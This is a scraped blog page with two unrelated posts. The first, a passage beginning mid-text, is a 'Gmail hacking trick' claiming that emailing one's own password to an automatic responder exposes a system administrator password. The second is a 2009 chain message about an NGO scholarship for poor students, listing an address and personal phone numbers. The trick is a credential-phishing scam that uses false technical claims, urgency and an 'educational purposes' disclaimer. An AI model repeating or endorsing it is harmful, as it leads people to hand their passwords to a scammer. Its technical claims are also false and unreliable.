Usually only system administrators should be able to use this, but when you
try it with your own password and mail this message from your Gmail account
the computer gets confused! Why your password is needed- automatic Gmail
responder will require your "system administrator password" which is in fact
your own password!!! But the : computer doesn't know.



THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR GMAIL! INBOX IN A MAIL
CALLED "SYSTEM REG MESSAGE" FROM "SYSTEM". This is an awesome trick and
works as many times as you try it. Have fun! NOTE: Use account you have been
using for few days say at least 30 days. Otherwise Gmail may take new
account as temporary and this trick may not work. Moreover use it soon
otherwise this flaw can be rectified soon.
Please be advised that it usually works with Gmail & AOL but i'm not to sure
about HOTMAIL but can try. THE ONLY WAY YOU CAN HACK SOMEONE'S AOL ACCOUNT
IS PROVIDING YOU HAVE AN AOL ACCOUNT.
ALTHOUGH THIS IS GMAIL ACCOUNT INFORMATION CENTER, IT HAS BEEN ABLE TO WORK
WITH AOL.
I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS INFORMATION NOR
WILL I BE HELD ACCOUNTABLE, THIS INFORMATION I'M SHARING IS FOR EDUCATIONAL
PURPOSES ONLY. PLEASE USE IT TO YOUR DISCRETION.............
HAPPY HACKING ......

Thursday 2 July 2009

For Poor & Bright Students

Dear Friends,

If you come across any bright students coming from poor financial
background who finished their 10th standard this year (April 2009) and
scored more than 80%,
Please ask them to contact the NGO-Prerana (supported by Infy foundation).

This NGO is conducting a written test and those who clear the test will
be eligible for financial help for their further studies.

Kindly ask the students to contact the people mentioned below to get the
form-

No.580, Shubhakar, 44th Cross,
1st ‘A’ Main Road, Jayanagar, 7th block, Bangalore.

Mob No:-

Ms Saraswati (99009-06338)
Mr Shiv kumar (9986630301) He sits at Hanumanthnagar Office,
Ms Bindu (9964534667) She sits at Yeshwantpur Office.

Even if you don’t know anyone, please pass on this info, some one might
be in need of this help desperately.

Thanks,
-Amaresh